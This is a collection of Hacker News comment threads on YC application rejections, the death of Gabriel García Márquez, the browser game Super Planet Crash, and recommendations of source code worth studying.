We're building a company now and spent months getting rejected about raising a seed round before suddenly becoming one of the "hot" companies with investors and being in a position to turn the same people who were turning us away down for a change.

All this to say Sam is right. If you're working on something, there is traction and/or you truly believe in it don't give up.

The only validation to worry about at this stage of the game is user validation.

Talk to Users. Write Code.

Best of luck with whatever you're building and if I can ever be of help feel free to email me (email in profile)

5
rafeed 2 days ago 1 reply      
Rejection is inevitable. If you're not rejected now, somewhere down the road you will be. If you haven't been rejected, get practice in getting rejected. If you have been rejected, feel the frustration and use it as motivation to prove whoever rejected you wrong.

The best analogy I can find for this is that applying to YC is like trying to pick up a girl or asking her out on a date. (I know many of us have yet to try, too). Get over the fear of rejection, and put yourself out there. Will your way to success. YC is like the smartest, most beautiful woman with the amazing personality everyone falls in love with (well, there's always the haters). Don't give up. Exercise, eat right, sleep, and strive to be better. You never know, one day that beautiful woman might actually say yes.

(To all the women on HN, replace girl/woman with guy/man and beautiful with handsome.)

6
eggbrain 1 day ago 0 replies      
Back about 5 years ago, a prominent VC behind TechStars came to my college and talked about entrepreneurship. I was so enamored that I decided I wanted to be an entrepreneur and apply to their incubator program.

I applied about 5 times with various ideas to various programs (Boulder, Seattle, New York). I got close once -- I was a "finalist" for the Seattle program (Top 30), but didn't get chosen as the top 10.

Each time left me pretty crushed. But I decided early on that I could sit around and feel bad about myself, or I could use it to become better. After each time I was rejected, I contacted the head of the incubator and thanked them for their time, and if they could give me any tips towards success. And more often than not, I got responses that helped me become a better entrepreneur.

The first rejection is always the hardest. And so is the second, the third, the fourth, and the fifth. But Edison is widely quoted as saying:

  "I have not failed 1,000 times.  I have successfully discovered 1,000 ways to NOT make a light bulb."
Despite what you may think of Edison, I try to take the same mentality. To those who got rejected -- think of it not as the end, but as the beginning. You'll enjoy the ride if you do.

7
dctoedt 1 day ago 0 replies      
FTA: [I]t was really striking how much higher the average quality of applications was for this batch compared to any previous batch. Most of the partners independently mentioned this to me.

To me that was the most interesting part of the article.

8
rvivek 2 days ago 1 reply      
We got into YC only the 3rd time in summer 2011; applied for the two earlier batches. Both of our earlier applications had bad ideas and very little traction.

So, don't give up.

9
VaedaStrike 2 days ago 1 reply      
As I go through the rest of my life I'll likely be applying just about every cycle simply for the way applying focuses my mind and energies.

And the funniest thing...I get more excited each time. Rejection after rejection, I get more and more certain that I'm getting closer and closer. Totally counter-intuitive from what I thought, both the excitement side of it and the applying for the 4th or 5th time... :) "Y" I ask you...

10
ipince 1 day ago 4 replies      
It's hard (or impossible) to give detailed feedback to every applicant. But maybe telling them roughly in which bucket they fell ("shortlist", "pretty good", "okay", "stopped reading after 30s") would be useful.
11
davidw 1 day ago 0 replies      
Just as the ever-increasing low cost accessibility of technology has made YC possible in that you can give someone just a little bit of money to build something, self-funded startups are also becoming possible for more and more things. Here are some resources:

http://discuss.bootstrapped.fm/

https://twitter.com/search?src=typd&q=%23microconf - lots of information on the recently concluded MicroConf with patio11 and many others from HN.

http://www.startupsfortherestofus.com/

And Rob's book, which is a great starting point: http://www.amazon.com/Start-Small-Stay-Developers-Launching/...

Granted, bootstrapping is not viable for some things, but for many others, it's a good path.

12
pincubator 1 day ago 1 reply      
We all know that it's almost impossible to provide custom feedback to those who are not selected. But is it also impossible to point out what portion of our application went wrong?

E.g. there might be 4-5 checkboxes for reviewers:

- Ideas are not clear

- Ideas are not profound/original

- Not profitable

- No demo

...

So at least we could know what went wrong. As most of the applicants, I think my idea was pretty cool and I am not sure what part I screwed up.

13
maximgsaini 15 hours ago 0 replies      
That is the Best Part of YC!!! If Albert Einstein had not been 'rejected' for 2 years, we might not have had that revolutionary glimpse into our own world (just saying). He might've accepted those stale old ideas by joining the academia of the time. Rejections force you to improve, rejections liberate you from previously held ideas, rejections force you to jump higher.

Inside YC, you help 50 companies. Outside YC, you help 2950 companies by giving your opinion on their performance. Some of these 2950 companies will someday blow everyone away!! They will give everyone a glimpse into a new world, just like the greats of the past did. And the likes of YC will be thanked, because every rejection will have some contribution in shaping them.

14
hyp0 1 day ago 0 replies      

  If youre working on something that users love,  you like working on it, and  you have a plan for how to build a business around it
Even with the mad hiring of new partners, there still aren't enough to take on all the applicants they'd like to (I assume that's the key resource bottleneck, not funding or space etc) - and the number and quality of applicants are increasing. It sounds like the YC we know so far may have just been the beginning.

A great release, both in facts and vibe; Elon standard.

15
fayyazkl 1 day ago 0 replies      
The best I think that can be done is to tell objectively why you didn't fund a company so either they focus on resolving those issues or at worst quit asap or move to a new idea. I dont know how much feedback is provided currently but it is immensely important even to those who got selected so they can focus on their strengths and fix their issues
16
mfrank 17 hours ago 0 replies      
Interesting that this is pretty different than what other VCs say is the worst part of their job: http://www.quora.com/Venture-Capital/What-is-the-worst-part-...
17
exo_duz 1 day ago 0 replies      
Whilst not everyone can get in. Best of luck to all that were accepted. We'll try again in 6 months.
18
sbuccini 2 days ago 1 reply      
Will we be notified regardless of our application's status?
19
jameshk 1 day ago 0 replies      
For everyone who get rejected: don't give up. keep working on your startup and apply next batch, even Drew Houston got rejected the first time.
20
hotpockets 2 days ago 0 replies      
I always think about the bubble groups. Darn it would suck to right on the bubble. Maybe they could create a separate, remotely managed cohort of bubble groups, that are adopted by HN.
21
650REDHAIR 2 days ago 0 replies      
How many companies that reapply get accepted during the next batch?
22
tpae 2 days ago 0 replies      
This. This is one of the biggest reasons why I want to get in so bad. Never give up. Thank you for this!
23
notastartup 2 days ago 1 reply      
What is the benefit of joining YC? If you are just making a profit and reinvesting some of that into the business, do you have an advantage of joining YC? Why should you give up a piece of your action?
24
datamingle 2 days ago 1 reply      
15 minutes old, with 1 comment: #1 post on Hacker News.
25
cynic2 1 day ago 0 replies      
Pass me a bucket. Fund or don't fund. You didn't pick the companies you didn't pick for a reason. Don't be warm and fuzzy about it. Having a Kumbaya moment is just patronising -- and I'm sure you didn't mean it that way, but that's how at least one person perceives it.
26
mempko 1 day ago 0 replies      
The worst part of YC is that they make groups of people compete with each other, instead of cooperate. The results are startups that have mediocre ideas that fill the needs of people who have money. If the phrase "vote with your dollar" is true, then it becomes obvious that the services and products society creates will cater to those with the most money.
20
Gabriel Garca Mrquez, Literary Pioneer, Dies at 87 nytimes.com
323 points by antr  7 hours ago   87 comments top 20
1
simonsarris 6 hours ago 5 replies      
Oh my. A paragon of magical realism and my second favorite author. Rest in peace.

Liking storytelling alone is sometimes not enough to like Marquez, you have to love language too. He uses (some might say abuses) language to impact his storytelling, often using incredibly long, convoluted sentences to weave his narrative. It can be hard to follow, sometimes intentionally, but I find it enormously satisfying to read and follow along with his brain. Like slowly drinking a maple syrup of words.

One of the best examples is the first 15 or so[1] pages of Autumn of the Patriarch[2], where the narrator winds this thread of what has happened slowly, using sentences that span pages, until you realize a shift from what has happened to a sort of what is about to happen. Then a fist slams on the table and the realization strikes you that the first part of the description was a kind of set up, this beautiful ruse. I wish I could be more descriptive but it would give away the delight. It's a great book about terror and despotism.

Marquez is not the kind of thing you can read in a noisy environment. At least I can't. I adore him so much. I could write a eulogy for days.

If you've never read him, please take a moment to read one of my favorite short stories, A Very Old Man With Enormous Wings

http://simonsarris.com/lit/a-very-old-man-with-enormous-wing...

(I've hosted a copy of it (and many more short stories) for ages because most of the copies on the web are plagued with ads and miserable formatting)

If One Hundred Years of Solitude seems too long for you, I urge you to look into some of his very excellent shorter books, such as Autumn but also Of Love and Other Demons[3] and Love in the Time of Cholera.[4]

(Chronicle of a Death Foretold is even shorter, but I do not recommend it as the first Marquez book you read!)

[1] It could be the first 10 or 30 pages, it's been several years, but I am certain it's one of the better (and shorter) examples of his style.

[2] http://www.amazon.com/dp/0060882867

[3] http://www.amazon.com/dp/1400034922

[4] http://www.amazon.com/dp/0307389731

2
rjtavares 7 hours ago 8 replies      
Many years later, in front of the firing squad, colonel Aureliano Buenda would remember that distant afternoon his father took him to see ice."

Best opening line of a book ever. RIP.

3
chimeracoder 6 hours ago 0 replies      
I read six of Garcia Mrquez's stories in school - my favorite was "The Handsomest Drowned Man in the World"[0] ("El Ahogado ms Hermoso del Mundo"). If you're looking to get a taste of his writing but don't have time to read an entire book, this short story captures his style very well.

In a similar vein is "An Old Man with Very Enormous Wings" [1] ("Un seor muy viejo con unas alas enormes"), which was referenced in R.E.M's music video for "Losing My Religion[2]

[0] https://hutchinson-page.wikispaces.com/file/view/The_Most_Ha...

[1] http://www.ndsu.edu/pubweb/~cinichol/CreativeWriting/323/Mar...

[2] https://www.youtube.com/watch?v=if-UzXIQ5vw

4
tdees40 6 hours ago 0 replies      
My favorite Marquez story is that he never used adverbs ending in -mente, so he called his English language translator (Edith Grossman) and requested that she not use any adverbs ending in -ly.
5
jpdlla 19 minutes ago 0 replies      
My first favorite novel in spanish was of GGM, "Relato de un nufrago"(The Story of a Shipwrecked Sailor). Many don't know but the full title is actually "Relato de un nufrago que estuvo diez das a la deriva en una balsa sin comer ni beber, que fue proclamado hroe de la patria, besado por las reinas de la belleza y hecho rico por la publicidad, y luego aborrecido por el gobierno y olvidado para siempre."(The Story of a Shipwrecked Sailor: Who Drifted on a Liferaft for Ten Days Without Food or Water, Was Proclaimed a National Hero, Kissed by Beauty Queens, Made Rich Through Publicity, and Then Spurned by the Government and Forgotten for All Time.)
6
russell 6 hours ago 0 replies      
"One Hundred Years of Solitude" was the only book that everyone in my family ever read, me, my wife and my three kids.

"Mr. Garca Mrquez, who received the Nobel Prize for Literature in 1982, wrote fiction rooted in a mythical Latin American landscape of his own creation, but his appeal was universal. His books were translated into dozens of languages. He was among a select roster of canonical writers Dickens, Tolstoy and Hemingway among them who were embraced both by critics and by a mass audience." from the article.

But the article doesnt begin to do the book justice. The mythology is Colombian but it all is real to the reader. It is very worthwnile to read One Hundred Years along with a literary biography of Marquez. It was a wonderful experience for me. BTW my taste is purely science fiction.

7
r4pha 6 hours ago 0 replies      
I absolutely adore this man. I was lucky to be given a portuguese-translated copy of "one hundred years of solitude" at the age of 16. I read it back then and loved the story itself and specially the beautiful writing style. About four or five years later I read it again in the original (even though I don't speak spanish very well) and was even more amazed about the beauty of it and about how _my_ interpretation of it changed. I loved everything I have ever read from him, but I loved "one hundred years" so much I even feel ashamed of trying to use my own words to describe it.
8
maceo 2 hours ago 1 reply      
Let's not forget that GGM was a life-long socialist and a supporter of the Cuban revolution.

He spent many years living and Cuba and he considered Castro to be one of his best friends. He was a firm supporter of Chavez, and looked forward to the day that Simon Bolivar's idea of a united Pan-America would be realized. Because of this, he was prohibited from entering the US during the Reagan administration.

As much as I love his works of fiction, my favorite book of his is the first volume of his autobiography, Living to Tell The Tale. I've been patiently waiting for news about volume 2 and 3 ever since the first one came out in 2002. I have never heard anything about these -- whether they were ever written remains a mystery. RIP to a magnificent man who brought so much pride to the people of our scarred continent.

9
paul_f 7 hours ago 5 replies      
Can someone provide a quick summary of what was it that made Marquez so prominent? I had not know much about him at all.

FYI, if like me, you have trouble accessing the article, and using Chrome, right-click and open in an incognito window.

10
3am 6 hours ago 2 replies      
Oh no... GGM was an underappreciated author in non-spanish speaking world (in spite of wonderful, gift translators... he was just an intrinsically difficult author to translate because of the poetic quality of his writing IMHO). Cien Anos de Soledad was one of the first non-trivial, non-english books I read. RIP.

edit: okay, removed 'really'.. I think he was underappreciated on a popular level, even though he was very well appreciated on a critical level.

11
noname123 6 hours ago 2 replies      
Can someone tell me what is the theme of "One Hundred Years of Solitude" as applied to modern society? I read the book awhile ago and appreciated greatly the various character sketches.

Unfortunately, the literary criticism that I sought out back then at liberal arts college, focused mostly on the metaphor of the European colonialism on Latin America (industrialization of the town with the rubber-plant, and the subsequent massacre of the residents after some kind of rubber-plant revolution, consequences of military rule and violent overthrows as embodied by Colonel Buendia and circular nature of the history, Spanish colonialism past long felt after Latin America became independent).

Tbh, I'm not really interested in the whole multiculturalism and ethnic studies rehashing the white guilt trope. However, I find the obsession of the various characters fascinating, the scientific obsession of the original patriach that eventually descended into madness, Colonel Buendia making little gold fishes, the incestuous natures of the whole family, some ethereal nympho character that doesn't speak a word and then one day transcend to haven much to the horror of the venerable matriarch. What is your interpretation of the book?

12
maceo 2 hours ago 0 replies      
In his autobiography he tells a story I love.

While writing 100 Years of Solitude he listened to The Beatles' A Hard Day Night album on repeat. After the book was published he received a letter from a group of Mexican college students who asked him if he was listening to A Hard Day's Night when writing the book, because they felt the album in his words.

13
noname123 6 hours ago 4 replies      
OT but tangential any magical realism authors to read? So far, I got Marquez, Jorge Louis Borges and Murakami. And preferably recommendation should be good to provide philosophical consolation to a code monkey worker-bee in the capitalist society.
14
ch4s3 6 hours ago 1 reply      
And now we may never know why Mario Vargas Llosa punched him in the face.
15
KhalilK 7 hours ago 1 reply      
His books were part of my adolescence, but "One Hundred Years of Solitude" was the essence of my formal education, I am sad he died but I am utterly glad he's lived.
16
dvidsilva 3 hours ago 0 replies      
I'm so 'proud' to see this here, hard to think of something to say so I'll put one of my fav quotes from him:

"She discovered with great delight that one does not love one's children just because they are one's children but because of the friendship formed while raising them."

17
deckardt 5 hours ago 1 reply      
This is one of the reasons I keep reading Hacker News. It's a great source for cutting-edge tech news; more importantly, it's also a great source for important news.
18
camus2 6 hours ago 0 replies      
As a programmer and a poetry/book lover, it is sad news, plrease have a 5min break from whatever code you are writing(on your free time of course) to check this author out!
19
rafaelvega 2 hours ago 0 replies      
I once met this american guy who told me in fluent spanish that he went and studied the spanish language after reading one of GGM's books because he wanted to read it in it's original language.
20
iraikov 2 hours ago 0 replies      
His writing was like poetry and song, all in one.Second best opening after "A Hundred Years of Solitude":

"It was inevitable: the scent of bitter almonds always reminded him of the fate of unrequited love. Dr. Juvenal Urbino noticed it as soon as he entered the still darkened house where he had hurried on an urgent call to attend a case that for him had lost all urgency many years before. The Antillean refugee Jeremiah de Saint-Amour, disabled war veteran, photographer of children, and his most sympathetic opponent in chess, had escaped the torments of memory with the aromatic fumes of gold cyanide."

21
Show HN: Super Planet Crash stefanom.org
317 points by CarolineW  2 days ago   118 comments top 46
1
todayiamme 2 days ago 5 replies      
I am usually quite resistant to games - even 2048 bounced off of me with little affect - but something about the idea of creating solar systems and playing around with nature's laws is deeply appealing and I just spent 15 minutes figuring out how to construct a system which can get as many points as possible without imploding. (hint: large multipliers. Here's an initial attempt that I intend to refine once I'm done with work; http://www.stefanom.org/spc/?view=2823906 )
2
stefanom 2 days ago 10 replies      
I am the developer of the game (StefanoM). I'm glad people are enjoying the game, and I'm sorry for the downtime -- I did not expect it to become this popular.

If you have any improvements or suggestions (especially on the programming side!), please email me directly.

Update: As an astronomer (and not a professional programmer), being on HN makes me super proud. Thank you!

3
oldmanjoe 2 days ago 0 replies      
Nice. Unfortunately my solar system was stable for about 40 years and then descended into a nightmarish world of Earth bouncing around the solar system in what would have been a horrific experience for the citizens of the planet. On the plus side the visuals from the multiple planets veering close to destroying it would have been a sight to remember. Well, remember for the short while that remained before the atmosphere either froze, was burned away by the sun or stripped by the gravitational field of a giant planet.
4
brownbat 5 hours ago 0 replies      
Not sure how much of an achievement this is, but I was a little proud of my co-orbital pair, introduced at around 37 years:

http://www.stefanom.org/spc/?view=5188442

5
wintersFright 2 days ago 5 replies      
does this imply that most solar system arrangements are unstable and we are lucky in ours?
6
lmm 2 days ago 0 replies      
Is there any way to delete the first planet? It seems like there's a motivation to keep refreshing until it spawns somewhere convenient.
7
kylec 2 days ago 1 reply      
3 bodies, 94.9 million, 500 years:

http://www.stefanom.org/spc/?view=2987733

Surprisingly stable, given the Earth-sized planet's erratic orbit.

8
guard-of-terra 2 days ago 0 replies      
Start with an accreation disk, it will evolve into a stable system in a few My.
9
devinmontgomery 2 days ago 0 replies      
So I used this to answer the obvious question: life would suck on Tatooine, with an earth-sized planet shooting in and out of the habitable zone. Then I found this: http://www.newscientist.com/article/dn23051-only-the-toughes....
10
supahfly_remix 1 day ago 0 replies      
Looks cool. How does the program keep errors from numerical approximations to the inverse square gravity law from blowing up?
11
TwoBit 2 days ago 0 replies      
It doesn't work for me with the latest FireFox. The interface won't let me do anything. Maybe the server is simply overloaded, because it's almost unresponsive and takes minutes to load the "high scores." It seems to work under Internet Explorer though.
12
munchor 2 days ago 0 replies      
This needs a few "overflow-x/y: hidden", but other than that it's a great game.
13
owenversteeg 2 days ago 0 replies      
I put 11 Earths in a row in very similar orbits. For some strange reason, some of them went out after ~100 years and made new, stable orbits. http://www.stefanom.org/spc/?view=2980198
14
Kiro 2 days ago 2 replies      
137,479 points over 500.2 years by just clicking out 12 earths randomly in the habitable zone and then set speed to max. Not sure I understand this.
15
m_mueller 2 days ago 1 reply      
I always wanted to know how it's possible to have a dual star system with planets in between the stars. It's easier than I thought[1]. I guess the heavier the second star, the further it must be from the inner planets.

[1] http://www.stefanom.org/spc/?view=2843935

16
higherpurpose 2 days ago 1 reply      
I put a dwarf star in the middle of the Sun (it placed it right next to it), and while it does destabilize the sun a bit, the rapid rotation of the dwarf star stabilizes it overall. The planet doesn't rotate in an uniform way around the two stars either, but it also seems stable overall, thus breaking the 500 year limit, at least:

http://postimg.org/image/jepystvbz/

17
phaemon 2 days ago 1 reply      
My best after a few attempts is:

500 Years, Score: 33,445,876, 7/12 bodies

See http://www.stefanom.org/spc/?view=2850139

18
golergka 2 days ago 0 replies      
I've managed to do that with a system that I was trying to create to break it: http://www.stefanom.org/spc/?view=2830379
19
metaphorm 2 days ago 1 reply      
LOVE THIS. still trying to do 2 dwarf stars. is it even possible?
20
gojomo 2 days ago 0 replies      
Can't load but the mere chance it's anything like either the ancient coin-op arcade game, 'Mad Planets', or the recent Flappy Bird variant, 'Flappy Space Program', makes me like it already.
21
rajahafify 2 days ago 1 reply      
2 suggestion.1) Make the new game not a full page refresh.2) Remove the first planet.
22
jpasden 2 days ago 0 replies      
So in "Super Planet Crash" the planets can't actually collide? I pumped 11 super-Earths into essentially the same orbit (in the habitable zone), and they seemed to just overlap and do just fine. When I lose, it's always because a planet flies off.
23
rootlocus 2 days ago 0 replies      
According to Kepler's law of planetary motion, the orbit of a planet is an ellipse with the Sun at one of the two foci. Although circles are ellipses, having the planets start with a circular motion makes the system simpler but somewhat unrealistic.
24
morganherlocker 2 days ago 1 reply      
Got to 1.2 billion 500 years, but it took forever. Next challenge: fastest possible completion with the highest score possible.
25
guybrushT 2 days ago 1 reply      
137 million fake points, 500 years, 1 addictive game. http://www.stefanom.org/spc/?view=3032407

A very simple and elegant idea. Well done.

26
notduncansmith 2 days ago 0 replies      
I found a bug: http://puu.sh/8arsr.png

The very first planet started on the absolute edge, then when I added a Dwarf Star pretty close to the Sun, it altered the orbit such that the planet went out of bounds but it didn't kill me.

27
Shivetya 2 days ago 3 replies      
looking at the high scores they all seem to be just exploiting the rules or a bug. Can those types of attempts be filtered?
28
dpeck 2 days ago 0 replies      
Looks like something that would translate over to ipad/iphone really well.
29
thix0tr0pic 2 days ago 2 replies      
30
srg0 2 days ago 1 reply      
It seems that running on the fastest possible setting helps to avoid (skip) most collisions by making them near-collisions.

P.S. Got to 430 years.

31
piyush_soni 2 days ago 0 replies      
Has someone created a mirror of the site yet which works? It's not opening up for me as usual, the HN effect.
32
ch4s3 2 days ago 0 replies      
dumping a bunch of super-earths into the same orbit around a dwarf star seems to work well. 125.8 years

http://www.stefanom.org/spc/?view=2906533

33
reshambabble 2 days ago 1 reply      
This is great, but I'd suggest having an instructional module as soon as a user signs on with more details about the different planet sizes, what they mean, and what the "actual" distance would be between the center and the 2AU barrier.
34
z3phyr 2 days ago 0 replies      
I always get carried away, and disrupt the equilibrium of earth like planets in the habitable zone with a brown dwarf :(
35
personjerry 2 days ago 0 replies      
I have found that starting a new game takes a significant amount of time due to load. One way to remedy this is by enabling Work Offline on your browser and simply refreshing the cached version.
36
easy_rider 2 days ago 1 reply      
Omg this is so awesome, and framestyle style website with retro coloring <3
37
FrejNorling 2 days ago 0 replies      
Got 7 bodies and 500 points... =)

http://screenpresso.com/=XTGMc

38
ycui1986 2 days ago 0 replies      
39
simonhorlick 2 days ago 0 replies      
41
jgeorge 2 days ago 0 replies      
This is great, fantastic work stefanom! I'm already addicted to it.
42
honksillet 2 days ago 0 replies      
Doesn't seem to be working on any of the browsers on my mac
43
cos2pi 2 days ago 1 reply      
I get NaNs when I put a Dwarf star as close as I can to the parent star. Perhaps a black hole is generated? :) http://www.stefanom.org/spc/?view=3069947
44
Crito 2 days ago 0 replies      
What physics model is being used for this? I can't seem to get tidal acceleration to work properly (it seems to for the first orbit, then it doesn't change.)
45
ch4s3 2 days ago 0 replies      
and we broke it
46
bagels 2 days ago 1 reply      
If you don't want to kill your site, you should make it possible to start a new game without reloading the whole page.
22
Ask HN: What source code is worth studying?
316 points by SatyajitSarangi  21 hours ago   146 comments top 69
1
sillysaurus3 20 hours ago 8 replies      
== Vim or Emacs ==

Just pick one and force yourself to use it to the exclusion of other editors. Future you will thank you later, because you'll still be using it 20 years from now. "We are typists first, programmers second" comes to mind. You need to be able to move chunks of code around, substitute things with regexes, use marks, use editor macros, etc.

== 6.824: Distributed Systems ==

http://pdos.csail.mit.edu/6.824-2013/ Do each lab. Read the discussion and rtm's course notes.

== Tarsnap ==

https://www.tarsnap.com/download.html How to write C. Study the "meta," that is, the choice of how the codebase is structured and the ruthless attention to detail. Pay attention to how functions are commented, both in the body of the function and in the prototypes. Use doxygen to help you navigate the codebase. Bonus: that'll teach you how to use doxygen to navigate a codebase.

== xv6 ==

http://pdos.csail.mit.edu/6.828/2012/xv6.html

http://pdos.csail.mit.edu/6.828/2012/xv6/xv6-rev7.pdf

http://pdos.csail.mit.edu/6.828/2012/xv6/book-rev7.pdf

Read the book. Force yourself to read it in its entirety. Use the source code PDF to study how to turn theory into practice.

== Arc ==

http://ycombinator.com/arc/arc3.1.tar

You're not studying Arc to learn Arc. You're studying Arc to learn how to implement Arc. You'll learn the power of anaphoric macros. You'll learn the innards of Racket.

Questions to ask yourself: Why did Racket as a platform make it easier to implement Arc than, say, C/Golang/Ruby/Python? Now pick one of those and ask yourself: what would be required in order to implement Arc on that platform? For example, if you say "C," a partial answer would be "I'd have to write my own garbage collector," whereas for Golang or Lua that wouldn't be the case.

The enlightenment experience you want out of this self-study is realizing that it's very difficult to express the ideas embodied in the Arc codebase any more succinctly without sacrificing its power and flexibility.

Now implement the four 6.824 labs in Arc. No, I'm not kidding. I've done it. It won't take you very long at this point. You'll need to read the RPC section of Golang's standard library and understand how it works, then port those ideas to Arc. Don't worry about making it nice; just make it work. Port the lab's unit tests to Arc, then ensure your Arc version passes those tests. The performance is actually not too bad: the Arc version runs only a few times slower than the Golang version if I remember correctly.

== Matasano crypto challenges ==

http://www.matasano.com/articles/crypto-challenges/ Just trust me on this one. They're cool and fun and funny. If you've ever wanted to figure out how to steal encrypted song lyrics from the 70's, look no further.

== Misc ==

(This isn't programming, just useful or interesting.)

Statistics Done Wrong http://www.statisticsdonewrong.com/

A Mathematician's Apology http://www.math.ualberta.ca/mss/misc/A%20Mathematician's%20A...

Surely You're Joking, Mr. Feynman http://web.archive.org/web/20050830091901/http://www.gorgora...

Zen and the Art of Motorcycle Maintenance http://www.arvindguptatoys.com/arvindgupta/zen-motorcycle.pd...

== Above All ==

Don't fall in love with studying theory. Practice. Do what you want; do what interests you. Find new things that interest you. Push yourself. Do not identify yourself as "an X programmer," or as anything else. Don't get caught up in debates about what's better; instead explore what's possible.

2
stiff 20 hours ago 1 reply      
I think you get more benefit from reading code if you study something very close to what you are working on yourself, something in the same domain, in the same framework perhaps, or at least in the same programming language, at best something you are deeply involved in currently.

I never seem to get enough motivation to read deeply into random "grand" code bases like Lua or SQLLite, but some months ago I got into the habit of always studying a bunch of projects that use a given technology before I use this technology, and it greatly decreased the amount of time it takes me to get to a "idiomatic" coding style. So instead of diving in a random, I would recommend making researching existing code-bases related to what you are currently doing an integral part of your workflow.

3
willvarfar 20 hours ago 1 reply      
Fabien Sanglard http://fabiensanglard.net has some excellent code reviews on his website, particularly games.

You could read some of the code-bases he reviews, and then read his review. You'll be able to compare and contrast your opinions with his, and if there's interesting variation you can blog about it ;)

4
robin2 17 hours ago 0 replies      
Slightly off topic, but Peter Seibel's take on the idea of code reading groups, and the idea of code as literature, is interesting: http://www.gigamonkeys.com/code-reading/

"Code is not literature and we are not readers. Rather, interesting pieces of code are specimens and we are naturalists. So instead of trying to pick out a piece of code and reading it and then discussing it like a bunch of Comp Lit. grad students, I think a better model is for one of us to play the role of a 19th century naturalist returning from a trip to some exotic island to present to the local scientific society a discussion of the crazy beetles they found."

The reason this is off topic is that it sounds like you were after interesting specimens anyway. I don't have any code examples as such, although if algorithms count I'm particularly fond of Tarjan's algorithm for finding strongly connected components in a directed graph, and the Burrows-Wheeler transform (as used in bzip).

5
fotcorn 20 hours ago 2 replies      
The Architecture of Open Source Applications book[0] gives a high level overview on many open source projects. It's a good starting point to dive into the code of these projects.

[0] http://aosabook.org/en/index.html

6
oneeyedpigeon 18 hours ago 1 reply      
To mix things up a bit, I'm going to give two very small examples of code that can be understood quickly, but studied diligently. Both are in JavaScript, which I notice you mention specifically in another comment:

[1] Douglas Crockford's JSON parser. Worth a look because it is excellently commented and is easily understandable https://github.com/douglascrockford/JSON-js/blob/master/json...

[2] Bouncing Beholder. A game written in 1K of highly obfuscated code, which the author expands upon here. Worth it because it teaches some crazy optimisation techniques that are applicable to all programming, but also includes plenty of javascript-specific trickery. http://marijnhaverbeke.nl/js1k/

7
dailo10 15 hours ago 1 reply      
Python Sudoku Solver by Peter Norvig -- an elegant solution in one page of code. When I read this, I felt like code is art.

http://norvig.com/sudoku.html

8
davidw 19 hours ago 0 replies      
I'm partial to the Tcl C code:

https://github.com/tcltk/tcl/blob/master/generic/tclFCmd.c

It's very nicely commented and has a nice, easy to read style throughout (except for the regexp files).

9
raverbashing 16 hours ago 0 replies      
The Linux Kernel

Very clean (mostly) and very revised C code, following a strict code convention

(Of course it's kernel code, so some things don't apply to userspace, still)

10
pcx 20 hours ago 0 replies      
I've heard lots of people sing praises for Redis source - https://github.com/antirez/redis. A cursory look into the source shows a very well documented code-base. It's one of the top items in my to-read-some-day list. Salvatore is an excellent C programmer and takes a lot of pain in writing good documentation, despite his not so great English skills. A shout out for him, thanks for setting an example.
11
spacemanmatt 14 hours ago 1 reply      
Please enjoy the source code of PostgreSQL (any version, but latest is generally recommended) core. It is very well factored, and typically also very well commented. This community cares a great deal about code quality, because they are so clear on the relation between readability, diagnosability, and execution correctness.
12
pavlov 19 hours ago 0 replies      
I learned a lot from the Cocotron source:

https://code.google.com/p/cocotron/source/browse

It's a free cross-platform implementation of Apple's Cocoa, so there's a lot of stuff there. But the project is well organized, and almost everything is written in a minimalist oldschool Objective-C style.

I've looked at some other cross-platform frameworks, and they are often hard to understand because they have been developed by a large group of developers and include lots of complex optimizations and platform-specific code paths. Cocotron is not as finely tuned as Apple's CoreFoundation (for example), but much more readable.

13
oscargrouch 10 hours ago 0 replies      
My personal list (mostly imperative languages)

C++: (Complex software with elegance + performance )

  Dart source code  V8 source code (Same people as Dart)  LevelDB  Chrome (the only downside: too much virtual dispatch ->   "javism")
C:

  SQLite  Redis  Nginx  Solaris and Freebsd
Java:

  Rich Hickey implementation of the clojure runtime in Java  (it was there in 2009.. maybe now this is in clojure itself??)
Go:

  The Go standard libraries

14
SixSigma 16 hours ago 0 replies      
The plan9 operating system

* The lack of ifdef's that make cross compiling a breeze

* It is easy to understand, compare to reading the Linux kernel

http://plan9.bell-labs.com/sources/plan9/sys/src/

15
biscarch 11 hours ago 1 reply      
Erlang: Riakhttps://github.com/basho/riakRiak is actually a layering of a few different projects including Riak KV, Yokozuna (Solr), Riak Core, etc. It was grown out of the Dynamo paper.

Haskell: Snaphttps://github.com/snapframework/snapSnap is another project built in layers (snap-server, io-streams, snaplets, snap-core). The 1.0 release makes some pretty massive structural changes behind the scenes changes with minimal breakage of the public api and io-streams is a very nice api to work with.

JavaScript: Underscore.jshttp://underscorejs.org/docs/underscore.htmlUnderscore is a utility library that gives a nice overview of various techniques in JS, such as how to handle equality, use of apply, ternary operators, etc. Many functions have fallbacks to ECMAScript 5 native functions.

16
Locke1689 10 hours ago 0 replies      
http://source.roslyn.codeplex.com/ for high performance, immutable C# code.

You'll see some differences from more relaxed C# projects (e.g., we avoid allocations like the plague), but I'd say we have pretty good style. ;)

17
fit2rule 19 hours ago 2 replies      
The sources to Lua are pretty darn great:

http://www.lua.org/source/5.2/

18
olalonde 18 hours ago 0 replies      
Javascript/Node.js: pretty much anything written by https://github.com/visionmedia his less popular libraries are not very well commented though) https://github.com/jashkenas/underscore

Scheme (and functional programming in general): examples/exercises from the SICP book

19
AhtiK 16 hours ago 2 replies      
Python => SQLAlchemy

Very clean, feature-rich yet pragmatic and well documented. https://github.com/zzzeek/sqlalchemy

20
projectileboy 15 hours ago 1 reply      
I'd echo the advice to read the Arc source, and I'd add the various versions of Quake (C, C++). I learned a lot reading John Carmack's code.
21
rch 14 hours ago 0 replies      
Take a look at Redis sometime. You might want to actually work on it a bit to help internalize what you're reading. Here are a couple of articles that might help get you started:

http://pauladamsmith.com/articles/redis-under-the-hood.html

http://www.starkiller.net/2013/05/03/hacking-redis-adding-in...

22
lamby 17 hours ago 0 replies      
"Beautiful Code" is worth a read-through, particularly for the commentary.

(One thing that I still remember years on is the "drop of sewage" example.)

23
maccard 2 hours ago 0 replies      
I'm interested in Game Development, specifically physics simulation and graphics programming. The box2D code (C) is fantastic.
24
rabino 3 hours ago 0 replies      
https://github.com/norman/friendly_id

To learn how to document code.

25
budu3 9 hours ago 0 replies      
The old jQuery 1.6.2 code by John Resig is a good start for studying good JavaScript coding practiceshttp://robflaherty.github.io/jquery-annotated-source/
26
agentultra 14 hours ago 0 replies      
Anything you find interesting or find yourself using frequently.

A less glib answer try Brogue: https://sites.google.com/site/broguegame/

A very interesting roguelike with interesting constraint-based features.

27
